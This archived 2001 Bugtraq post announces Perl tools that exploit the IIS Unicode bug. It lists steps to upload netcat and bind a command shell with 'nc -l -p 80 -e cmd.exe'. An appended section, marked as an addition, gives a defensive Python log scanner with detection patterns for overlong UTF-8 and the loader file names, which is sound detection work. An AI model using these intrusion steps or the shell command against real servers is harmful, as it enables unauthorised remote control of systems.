[18797] in bugtraq


shell on IIS server with Unicode using *only* HTTP

daemon@ATHENA.MIT.EDU (Roelof Temmingh)
Thu Jan 25 02:28:30 2001

Message-Id:  <Pine.BSF.4.21.0101250130460.67247-101000@wips.sensepost.com>
Date:         Thu, 25 Jan 2001 02:30:10 +0200
Reply-To: Roelof Temmingh <roelof@SENSEPOST.COM>
From: Roelof Temmingh <roelof@SENSEPOST.COM>
X-To:         info@sensepost.com
To: BUGTRAQ@SECURITYFOCUS.COM

(assumes an IIS server vulnerable to the Unicode bug)

Tarball contains two PERL scripts:

1. Unicode upload creator (unicodeloader.pl)

 Works like this - two files (upload.asp and upload.inc - have
 them in the same dir as the PERL script) are built in the webroot
 (or anywhere else) using echo and some conversion strings.
 These files allow you to upload any file by
 simply surfing with a browser to the server.

 Typical use: (5 easy steps to a shell)
 1. Find the webroot (duh)
 2. perl unicodeloader target:80 'webroot'
 3. surf to target/upload.asp and upload nc.exe
 4. perl unicodexecute3.pl target:80 'webroot/nc -l -p 80 -e cmd.exe'
 5. telnet target 80

 Above procedure will drop you into a shell on the box
 without crashing the server (*winks at Eeye*).

 This procedure is nice for servers that are very tightly
 firewalled; servers that are not allowed to FTP, RCP or TFTP
 to the Internet.

2. Unicodexecute version3 (unicodexecute3.pl)
 same as before plus
 -includes searches for alternative executable dirs
 -more robust, stable than before
 -checks for access denied etc. added


Regards,
Roelof.

------------------------------------------------------
Roelof W Temmingh		SensePost IT security
roelof@sensepost.com		+27 83 448 6996
		http://www.sensepost.com		
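
Added example, not part of the original post or its tarball: a defender-side log check in Python for the activity described above. It flags request URIs that carry non-shortest-form UTF-8 (the malformed encoding class behind the IIS Unicode bug) or the file names mentioned in the post. The log layout, sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed log lines (date time client method uri status); not from a real server.
SAMPLE_LOG = """\
2001-01-25 00:01:02 10.0.0.5 GET /pub/caf%c3%a9.htm 200
2001-01-25 00:01:09 10.0.0.9 GET /pub/%c0%af/index.htm 200
2001-01-25 00:01:15 10.0.0.9 GET /pub/%e0%80%af/index.htm 404
2001-01-25 00:01:20 10.0.0.9 GET /pub/%25c0%25af/index.htm 404
2001-01-25 00:02:30 10.0.0.9 POST /upload.asp 200
2001-01-25 00:03:11 10.0.0.9 GET /pub/tool?run=cmd.exe 404
2001-01-25 00:04:00 10.0.0.7 GET /default.htm 200
"""

# Bytes that only occur in non-shortest-form UTF-8: C0/C1, E0+80..9F, F0+80..8F.
OVERLONG = re.compile(rb"[\xc0\xc1]|\xe0[\x80-\x9f]|\xf0[\x80-\x8f]")
# File names taken from the post: the loader pair and the shell it launches.
ARTIFACTS = re.compile(rb"(?i)\bupload\.(?:asp|inc)\b|\bcmd\.exe\b")

def fully_decode(uri, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%25c0) is unwrapped."""
    data = uri.encode("utf-8")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def classify(uri):
    raw = fully_decode(uri)
    reasons = []
    if OVERLONG.search(raw):
        reasons.append("overlong-utf8")
    if ARTIFACTS.search(raw):
        reasons.append("loader-or-shell-name")
    return reasons

def scan(log_text):
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        client, uri = fields[2], fields[4]
        reasons = classify(uri)
        if reasons:
            hits.append((client, uri, reasons))
    return hits
```

Bytes C0 and C1 are ordinary characters in single-byte code pages, so on sites with legacy-encoded URLs treat the first rule as a lead for review rather than a verdict.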

[Attachment: unitools.tgz, application/octet-stream]
